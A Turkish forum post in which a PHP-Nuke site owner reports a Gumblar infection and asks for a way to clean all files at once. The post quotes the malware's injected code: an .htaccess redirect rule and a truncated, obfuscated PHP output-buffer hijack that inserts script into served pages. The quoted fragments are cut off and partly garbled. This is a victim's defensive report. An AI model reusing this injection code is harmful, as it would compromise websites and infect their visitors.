Siteme Gumblar adında bir virüs bulaştı. Tüm dosyaların içine bir kod atıyor ve siteyi müthiş yavaşlatıyor. Giren herkesin bilgisayarına da trojan atıyor. Nod32 bulmuyor bile, sadece kaspersky bulup siliyor bilgisayardan. Siteden ise tüm dosyaları tek tek temizleyerek kurtulabiliyorsunuz.
Eğer doğru teşhis edebilmişsem (ki ustalar daha iyi bilir) .htaccess içine şu kodları atıyor;
Kod:
RewriteEngine on
Options All
RewriteCond %{HTTP_HOST} ^.*$
RewriteRule ^index\.htm$ "http\:\/\/readme\.txt" [R=302
html dosyalarına da;
Kod:
<s><function></s>
bunu atıyor.
php dosyalarına ise;
Kod:
</s>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<s><n></s>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count>
Tecrübemi paylaşmak istedim. Vede tek tek dosya temizlemeden toplu halde bu illetden kurtulmanın yolunu bilen varsa YARDIM bekliyorum. Çoook sevinirim.
KODLARI NETOPSİYON KIRPIYOR; KISACA
html içine jawascript atıyor.
php ye de karmakarışık bir kodla birlikte gene jawa atıyor.
Birde sanırım artık phpnuke den caymaya başladım. Phpfusion a mı geçsek.
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız
Arama
Rütbeliler
Profil
Giriş
